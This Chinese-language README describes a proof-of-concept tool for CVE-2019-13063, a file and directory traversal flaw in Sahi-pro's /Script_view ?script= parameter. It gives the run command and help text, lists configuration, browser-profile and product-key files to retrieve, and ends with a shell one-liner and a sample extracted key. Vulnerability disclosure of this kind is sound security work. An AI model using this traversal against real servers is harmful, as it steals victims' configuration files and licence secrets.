在 Sahi-pro 脚本管理器 Web 应用程序中发现了一个问题,存在文件和目录遍历漏洞,该漏洞位于 /Script_view 页面的 ?script= 参数中。攻击者可以发送特制的 URL 来检索并窃取受害者的敏感文件。
这是一个用于利用 Sahi-pro Web 应用程序中目录遍历和文件遍历漏洞的概念验证工具。
影响: 在 Sahi-pro Web 应用程序软件中,存在一个目录和文件遍历漏洞,该漏洞会导致应用程序中的敏感信息泄露,或被用于直接获取系统文件。
script_view 页面上的 ?script= 参数容易受到文件和目录遍历攻击,从而列出文件内容。
运行方式如下:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
这将下载应用程序的产品密钥。
指定完整的 URL,包括你想要下载的文件附加到易受攻击的 ?script= 参数之后。
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
此脚本仅尝试下载整个页面,你可以轻松地从页面中解析出所需的内容,因为它位于唯一的 <ol><li> HTML 参数之间,只需使用简单的 bash 单行命令即可。
解析产品密钥的示例:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533